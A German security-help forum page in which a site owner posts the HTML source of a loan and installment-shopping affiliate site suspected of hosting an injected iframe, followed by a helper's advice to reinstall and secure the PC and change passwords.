569         <p><em><strong>Gute Kunden vergisst man nicht !<br /></strong></em></p>

570         <ul>

571         <li>Hat man schon einmal bei einem Onlineshop eingekauft und die Rechnung pünktlich bezahlt, wird einem schneller die Ratenzahlung gewährt. Da der Kunde schon in der Datenbank des Unternehmens registriert ist. Jedoch haben auch Neukunden nichts zu befürchten. Hat man bis dato alle Rechnungen zeitig bezahlt und besitzt keine negative Bonität, steht dem Ratenkauf auch als Neukunde eines Shops nichts im Wege. Per Bonitätscheck erhält der Shopbetreiber alle releva

nten Infos mit den wichtigsten Details und kann schnell und problemlos die gewünschte Zahlart gewähren. Wie überall im Leben gilt auch beim Internetshopping – einwandfreier Leumund sichert Vertrauen und gewährt 100%ige Zahlungsfreiheit. </li>

572         </ul>

573         <p><em><strong>Informiert bleiben &amp; Geld sparen</strong></em></p>

574         <ul>

575         <li>Aktuell ist es recht schwierig sich über alle Angebote im klaren zu sein, da eine sehr hohe Variantenvielfalt existiert. Ratenkauf 24 bietet Ihnen eine umfangreiche Auswahl an renommierten Shopbetreibern. Relevante und wichtige Detailinfos erhalten Sie gut strukturiert im Überblick. Dank diesen Informationen spart man sich die Zeit für aufwendige Recherchen. </li>

576         <li>Sie finden ratenkauf-24.de auch auf den Social Netzwerken <a href="/ratenshops/?r=1187" target="_blank" rel="nofollow"><img src="hxxp://logos.ratenkauf-24.de/facebook.png" border="0" title="Facebook" /></a> und <a href="/ratenshops/?r=1188" target="_blank" rel="nofollow"><img src="hxxp://logos.ratenkauf-24

.de/twitter.png" border="0" /></a> vertreten. Hier finden Sie aktuelle Neuigkeiten &amp; Informationen, eigene Feedbacks und News.</li>

577         </ul>

578         

579         <div class="clr"></div>

580         <div class="clr"></div>

581         <span class="article_separator"></span>

582         

583         

584         

585         

586         

587         

588         

589         

590         <h4 style="margin:10px 0 0 0;">Vergleich von Kreditangeboten</h4>

591         <p>Dank attraktiver Zinskonditionen ist heutzutage eine Finanzierung recht sinnvoll. Entweder hat man die notwendigen Geldmittel nicht auf Anhieb parat, oder man möchte sich eine finanzielle Flexibilität ermöglichen. Folgend haben wir zuverlässige Kreditanbieter aufgelistet, die wir hinsichtlich Zinskonditionen, Service und Angebot empfehlen können:</p>

592         <table style="-moz-border-radius:10px;background-color:#F6F6F6;" border="0">

593         <tbody>

594         <tr>

595         <td width="120" height="70"><a href="/ratenshops/?r=945" target="_blank" rel="nofollow"><img src="hxxp://logos.ratenkauf-24.de/barclaycard.png" border="0" alt="Barclaycard " title="Ratenkredite und Kreditangebot" width="100" height="50" style="vertical-align: top; border: 0pt none;" /></a></td>

596         <td width="570">

597         <h5><a href="/ratenshops/?r=945" target="_blank" rel="nofollow">barclaycard</a></h5>

598         Der Spezialist für Kredite mit jahrelanger Erfahrung. Attraktive Konditonen für jeden Kunden. Auch bei Selbstständigkeit möglich.</td>

599         <td><a href="/ratenshops/?r=945" target="_blank" rel="nofollow"><img src="hxxp://logos.ratenkauf-24.de/shop.gif" border="0" alt="barclaycard.de" title="Kredite für jeden" width="81" height="20" style="vertical-align: top; margin-top: 10px; border: 0pt none;" /></a></td>

600         </tr>

601         <tr>

602         <td width="120" height="70"><a href="/ratenshops/?r=940" target="_blank" rel="nofollow"><img src="hxxp://logos.ratenkauf-24.de/dkb.png" border="0" alt="DKB" title="DKB Privatdarlehen" width="100" height="50" style="vertical-align: top; border: 0pt none;" /></a></td>

603         <td width="570">

604         <h5><a href="/ratenshops/?r=940" target="_blank" rel="nofollow">DKB</a></h5>

605         Ihre Internetbank mit weltweiter Bargeldabhebung - und das kostenfrei. Kostenloses Girokonto mit Kreditkarte &amp; Finanzdienstleistungen.</td>

606         <td><a href="/ratenshops/?r=940" target="_blank" rel="nofollow"><img src="hxxp://logos.ratenkauf-24.de/shop.gif" border="0" alt="DKB" title="Kredite auch mit Schufa" width="81" height="20" style="vertical-align: top; margin-top: 10px; border: 0pt none;" /></a></td>

607         </tr>

608         

609         <tr>

610         <td width="120" height="70"><a href="/ratenshops/?r=942" target="_blank" rel="nofollow"><img src="hxxp://logos.ratenkauf-24.de/credit-europe-bank.png" border="0" alt="CEB" title="Direktkredite mit günstigen Zinsen" width="100" height="50" style="vertical-align: top; border: 0pt none;" /></a></td>

611         <td width="570">

612         <h5><a href="/ratenshops/?r=942" target="_blank" rel="nofollow">CEB</a></h5>

613         Individuelle Kredite mit variablen Laufzeiten. Ideale Konditionen für Privat- &amp; Geschäftskunden. Jetzt unverbindlich Kreditangebot berechnen.</td>

614         <td><a href="/ratenshops/?r=942" target="_blank" rel="nofollow"><img src="hxxp://logos.ratenkauf-24.de/shop.gif" border="0" alt="Credit Europe Bank" title="attraktive Kredite bei der CEB" width="81" height="20" style="vertical-align: top; margin-top: 10px; border: 0pt none;" /></a></td>

615         </tr>

616         <tr>

617         <td width="120" height="70"><a href="/ratenshops/?r=943" target="_blank" rel="nofollow"><img src="hxxp://logos.ratenkauf-24.de/smava.png" border="0" alt="Privatkredite" title="Direktbank Smava" width="100" height="50" style="vertical-align: top; border: 0pt none;" /></a></td>

618         <td width="570">

619         <h5><a href="/ratenshops/?r=943" target="_blank" rel="nofollow">Smava</a></h5>

620         Geld leihen zu attraktiven Zinsen von Privatpersonen. Smava gehört zu den größten Kredit-Marktplätzen in Deutschland.</td>

621         <td><a href="/ratenshops/?r=943" target="_blank" rel="nofollow"><img src="hxxp://logos.ratenkauf-24.de/shop.gif" border="0" alt="Smava" title="Direktkredite" width="81" height="20" style="vertical-align: top; margin-top: 10px; border: 0pt none;" /></a></td>

622         </tr>

623         <tr>

624         <td width="120" height="70"><a href="/ratenshops/?r=988" target="_blank" rel="nofollow"><img src="hxxp://logos.ratenkauf-24.de/kredit-scout.png" border="0" alt="Kredit Scout" title="Top Konditionen" width="100" height="50" style="vertical-align: top; border: 0pt none;" /></a></td>

625         <td width="570">

626         <h5><a href="/ratenshops/?r=988" target="_blank" rel="nofollow">Kredit-Scout</a></h5>

627         Seriöser Kreditanbieter mit günstigen Online Krediten. Kredit Scout bietet eine Anfrage die kostenlos ist.</td>

628         <td><a href="/ratenshops/?r=988" target="_blank" rel="nofollow"><img src="hxxp://logos.ratenkauf-24.de/shop.gif" border="0" alt="kredit-scout" title="zum Kredit Scout" width="81" height="20" style="vertical-align: top; margin-top: 10px; border: 0pt none;" /></a></td>

629         </tr>

630         <tr>

631         <td width="120" height="70"><a href="/ratenshops/?r=944" target="_blank" rel="nofollow"><img src="hxxp://logos.kauf-auf-rechnung24.com/bon-kredit.png" border="0" alt="günstige Kredite" title="faire Zinskonditionen" width="100" height="50" style="vertical-align: top; border: 0pt none;" /></a></td>

632         <td width="570">

633         <h5><a href="/ratenshops/?r=944" target="_blank" rel="nofollow">Bonkredit24</a></h5>

634         Sofortkredite und Kredite ohne Schufa in 24 Stunden. Kostenloses Angebot von Bonkredit24 sichern und die finanziellen Möglichkeiten erhöhen.</td>

635         <td><a href="/ratenshops/?r=944" target="_blank" rel="nofollow"><img src="hxxp://logos.ratenkauf-24.de/shop.gif" border="0" alt="Ratenkredit ohne Schufa Auskunft" title="Bon Kredit" width="81" height="20" style="vertical-align: top; margin-top: 10px; border: 0pt none;" /></a></td>

636         </tr>

637         </tbody>

638         </table>

639         

640         <div class="clr"></div>

641         <div class="clr"></div>

642         <span class="article_separator"></span>

643         </div></div></div>    

644             <div class="clr"></div>

645         

646             

647             </div>

648         

649         

650             </div>

651             <!--End Component Area-->    

652             </div>

653             

654                 

655             

656             <!--Module Position breadcrumbs-->

657             <div class="clr"></div>

658                 

659                 <div id="breadcrumbs" class="clearfix">

660                     <div class="sp-padding">

661                                             <strong>Aktuelle Seite :  </strong><span class="breadcrumbs">

662         <span class="current">Startseite</span></span>

663                                         <!---->

664                     </div>    

665                 </div>    

666             

667             </div>

668         

669         

670             <!--Module Position bottom1 to bottom6-->

671                     <div id="sp-bottom" class="clearfix">

672                 <div class="sp-grid-12">

673                                     <div class="sp-grid-6 alpha">

674                                     <div class="module">

675                                         <h3>            

676                             <span>Kategorien</span>                    </h3>

677                         <div class="clr"></div>

678                         

679                     

680         <div id="k2ModuleBox119" class="k2TagCloudBlock ">

681                     <a href="/component/k2/itemlist/tag/Accessoires.html" style="font-size:114%" title="7 Artikel tags: Accessoires">

682                 Accessoires    </a>

683                         <a href="/component/k2/itemlist/tag/ATU.html" style="font-size:110%" title="1 Artikel tags: ATU">

684                 ATU    </a>

685                         <a href="/component/k2/itemlist/tag/Auto.html" style="font-size:113%" title="5 Artikel tags: Auto">

686                 Auto    </a>

687                         <a href="/component/k2/itemlist/tag/C&amp;A.html" style="font-size:110%" title="1 Artikel tags: C&A">

688                 C&A    </a>

689                         <a href="/component/k2/itemlist/tag/Damenmode.html" style="font-size:122%" title="22 Artikel tags: Damenmode">

690                 Damenmode    </a>

691                         <a href="/component/k2/itemlist/tag/Fahrrad.html" style="font-size:110%" title="1 Artikel tags: Fahrrad">

692                 Fahrrad    </a>

693                         <a href="/component/k2/itemlist/tag/Fernseher.html" style="font-size:114%" title="8 Artikel tags: Fernseher">

694                 Fernseher    </a>

695                         <a href="/component/k2/itemlist/tag/Foto.html" style="font-size:110%" title="1 Artikel tags: Foto">

696                 Foto    </a>

697                         <a href="/component/k2/itemlist/tag/Große Größen.html" style="font-size:110%" title="1 Artikel tags: Große Größen">

698                 Große Größen    </a>

699                         <a href="/component/k2/itemlist/tag/Handy.html" style="font-size:115%" title="9 Artikel tags: Handy">

700                 Handy    </a>

701                         <a href="/component/k2/itemlist/tag/Herrenmode.html" style="font-size:117%" title="13 Artikel tags: Herrenmode">

702                 Herrenmode    </a>

703                         <a href="/component/k2/itemlist/tag/Junge Mode.html" style="font-size:113%" title="5 Artikel tags: Junge Mode">

704                 Junge Mode    </a>

705                         <a href="/component/k2/itemlist/tag/Karstadt.html" style="font-size:110%" title="1 Artikel tags: Karstadt">

706                 Karstadt    </a>

707                         <a href="/component/k2/itemlist/tag/Lampen.html" style="font-size:110%" title="1 Artikel tags: Lampen">

708                 Lampen    </a>

709                         <a href="/component/k2/itemlist/tag/Lifestyle.html" style="font-size:112%" title="3 Artikel tags: Lifestyle">

710                 Lifestyle    </a>

711                         <a href="/component/k2/itemlist/tag/Möbel.html" style="font-size:114%" title="8 Artikel tags: Möbel">

712                 Möbel    </a>

713                         <a href="/component/k2/itemlist/tag/OBI.html" style="font-size:110%" title="1 Artikel tags: OBI">

714                 OBI    </a>

715                         <a href="/component/k2/itemlist/tag/Otto.html" style="font-size:110%" title="1 Artikel tags: Otto">

716                 Otto    </a>

717                         <a href="/component/k2/itemlist/tag/PC.html" style="font-size:116%" title="12 Artikel tags: PC">

718                 PC    </a>

719                         <a href="/online-shopping.html" style="font-size:150%" title="77 Artikel tags: Ratenkauf">

720                 Ratenkauf    </a>

721                         <a href="/sale.html" style="font-size:136%" title="49 Artikel tags: sale">

722                 sale    </a>

723                         <a href="/component/k2/itemlist/tag/Schuhe.html" style="font-size:113%" title="6 Artikel tags: Schuhe">

724                 Schuhe    </a>

725                         <a href="/component/k2/itemlist/tag/Technik.html" style="font-size:115%" title="9 Artikel tags: Technik">

726                 Technik    </a>

727                         <a href="/component/k2/itemlist/tag/Uhren.html" style="font-size:113%" title="5 Artikel tags: Uhren">

728                 Uhren    </a>

729                         <a href="/component/k2/itemlist/tag/Versandhaus.html" style="font-size:113%" title="6 Artikel tags: Versandhaus">

730                 Versandhaus    </a>

731                         <a href="/component/k2/itemlist/tag/Wohnartikel.html" style="font-size:113%" title="5 Artikel tags: Wohnartikel">

732                 Wohnartikel    </a>

733                     <div class="clr"></div>

734         </div>

735                     <div class="clr"></div>

736                 </div>

737                 <div class="gap"></div>

738             

739                         </div>

740                                     <div class="sp-grid-6 omega">

741                                     <div class="module">

742                                         <h3>            

743                             <span>Allgemeine</span> Infos                    </h3>

744                         <div class="clr"></div>

745                         

746                     <p style="font-size:12px;"><a href="/kontakt.html">Kontakt</a> <br/>

747         <a href="/presse.html">Presse</a> <br />

748         <a href="/component/xmap/?sitemap=1">Sitemap</a> <br />

749         <a href="/impressum.html">Impressum</a> <br />

750         <a href="/datenschutz.html">Datenschutz</a></p>

751         <p><a href="/ratenshops/?r=1187" target="_blank" rel="nofollow"><img src="hxxp://logos.ratenkauf-24.de/facebook.png" title="Facebook" alt="Facebook.de"></a> <a href="/ratenshops/?r=1188" target="_blank" rel="nofollow"><img src="hxxp://logos.ratenkauf-24.de/twitter.png" title="Twitter" alt="

Twitter.de"></a> <a href="hxxp://www.google.com/intl/de/+/learnmore" target="_blank" rel="nofollow"><img src="hxxp://logos.ratenkauf-24.de/googleplus.png" title="Google +" alt="Anmelden und mit Freunden teilen"></a> <a href="/index.php"><img src="hxxp://logos.ratenkauf-24.de/rss.png" alt="rss feed&quo

t; title="rss feed bestellen"></a> <a href="/kontakt.html"><img src="hxxp://logos.ratenkauf-24.de/email.png" title="Ihre Mail an uns" alt="Email Kontakt"></a></p>            <div class="clr"></div>

752                 </div>

753                 <div class="gap"></div>

754             

755                         </div>

756                             </div>

757                 </div>

758                 </div>

759             </div>

760             

761             <div id="sp-footer" class="clearfix">

762             <div class="sp-container">    

763             <div class="sp-grid-12">    

764                 <div id="footer-nav">

765                     

766                 </div>

767                 <div class="cp">

768                      &copy; www.ratenkauf-24.de - Alle Rechte vorbehalten - 2012        </div>

769             </div>    

770             </div>    

771             </div>

772         

773         <!-- Google Analytics -->

774         

775         <script type="text/javascript">

776         

777         var _gaq = _gaq || [];

778         _gaq.push(['_setAccount', 'UA-29869686-1']);

779         _gaq.push(['_gat._anonymizeIp']);

780         _gaq.push(['_trackPageview']);

781         

782         (function() {

783         var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;

784         ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'hxxp://www') + '.google-analytics.com/ga.js';

785         var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);

786         })();

787         

788         </script>

789         

790         <!-- Google Plus -->

791         <script type="text/javascript" src="https://apis.google.com/js/plusone.js">

792         {lang: 'de'}

793         </script>

794         

795         <!-- facebook Like Button -->

796         

797         <div id="fb-root"></div>

798         <script>(function(d, s, id) {

799         var js, fjs = d.getElementsByTagName(s)[0];

800         if (d.getElementById(id)) return;

801         js = d.createElement(s); js.id = id;

802         js.src = "//connect.facebook.net/de_DE/all.js#xfbml=1";

803         fjs.parentNode.insertBefore(js, fjs);

804         }(document, 'script', 'facebook-jssdk'));</script>

805             

806         </body>

807         </html>
 

Copyright © 2005 - 2012 I.T. Mate - All Rights Reserved [ Docs:  Help Us | Privacy Policy | Terms of Use  ]

ertwas komisches ist mir aufgefallen.

Wennich nach einer Weile die Domain scanne, gibt es keine Fehlermeldung. Das iframe ist auf einmal nicht mehr da. Es sieht doch sehr nach einem Serverproblem seitens des Hosters aus, oder ?

wir könnten ja einmal den pc neu aufsetzen um diese quelle als infektions ort auszuschließen und kümmern uns danach um die seite.
der pc muss neu aufgesetzt und dann abgesichert werden
1. Datenrettung:

deaktiviere Autorun: http://www.trojaner-board.de/83238-a...sschalten.html
dann sichere Daten auf nen externen datenträger: http://www.trojaner-board.de/82533-d...ted-magic.html
Bilder, Dokumente, Musik Videos (persönliches) http://www.trojaner-board.de/71715-k...iendungen.html

2. Formatieren, Windows neu instalieren:

nutzt du eine Windows CD: http://www.trojaner-board.de/51262-a...sicherung.html
recovery cd oder recovery partition.
falls dies ein fertig pc ist, nenne hersteller + typ.
Keine Windows 7 DVD? http://www.trojaner-board.de/100776-...-download.html

3. PC absichern: http://www.trojaner-board.de/96344-a...-rechners.html
ich werde außerdem noch weitere punkte dazu posten.
4. alle Passwörter ändern!
5. nach PC Absicherung, die gesicherten Daten prüfen und falls sauber: zurückspielen.
6. werde ich dann noch was zum absichern von Onlinebanking mit Chip Card Reader + Star Money sagen.